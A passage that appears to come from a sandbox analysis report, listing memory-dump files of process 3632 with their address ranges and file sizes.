                                                    • memory/3632-303-0x00007FFF748F0000-0x00007FFF74913000-memory.dmp

                                                      Filesize

                                                      140KB

                                                    • memory/3632-342-0x00007FFF60500000-0x00007FFF6061C000-memory.dmp

                                                      Filesize

                                                      1.1MB

                                                    • memory/3632-351-0x00007FFF710A0000-0x00007FFF710AD000-memory.dmp

                                                      Filesize

                                                      52KB

                                                    • memory/3632-350-0x00007FFF70D60000-0x00007FFF70D79000-memory.dmp

                                                      Filesize

                                                      100KB

                                                    • memory/3632-349-0x00007FFF61400000-0x00007FFF61577000-memory.dmp

                                                      Filesize

                                                      1.5MB

                                                    • memory/3632-348-0x00007FFF6C470000-0x00007FFF6C493000-memory.dmp

                                                      Filesize

                                                      140KB

                                                    • memory/3632-347-0x00007FFF71D70000-0x00007FFF71D89000-memory.dmp

                                                      Filesize

                                                      100KB

                                                    • memory/3632-346-0x00007FFF70D80000-0x00007FFF70DAD000-memory.dmp

                                                      Filesize

                                                      180KB

                                                    • memory/3632-345-0x00007FFF60B40000-0x00007FFF60C0D000-memory.dmp

                                                      Filesize

                                                      820KB

                                                    • memory/3632-344-0x00007FFF748F0000-0x00007FFF74913000-memory.dmp

                                                      Filesize

                                                      140KB

                                                    • memory/3632-343-0x00007FFF76A50000-0x00007FFF76A5F000-memory.dmp

                                                      Filesize

                                                      60KB

                                                    • memory/3632-339-0x00007FFF60620000-0x00007FFF60B40000-memory.dmp

                                                      Filesize

                                                      5.1MB

                                                    • memory/3632-337-0x00007FFF6B910000-0x00007FFF6B943000-memory.dmp

                                                      Filesize

                                                      204KB

                                                    • memory/3632-328-0x00007FFF617C0000-0x00007FFF61DA9000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                    • memory/3632-71-0x00007FFF748F0000-0x00007FFF74913000-memory.dmp

                                                      Filesize

                                                      140KB

                                                    • memory/3632-340-0x00007FFF70180000-0x00007FFF70194000-memory.dmp

                                                      Filesize

                                                      80KB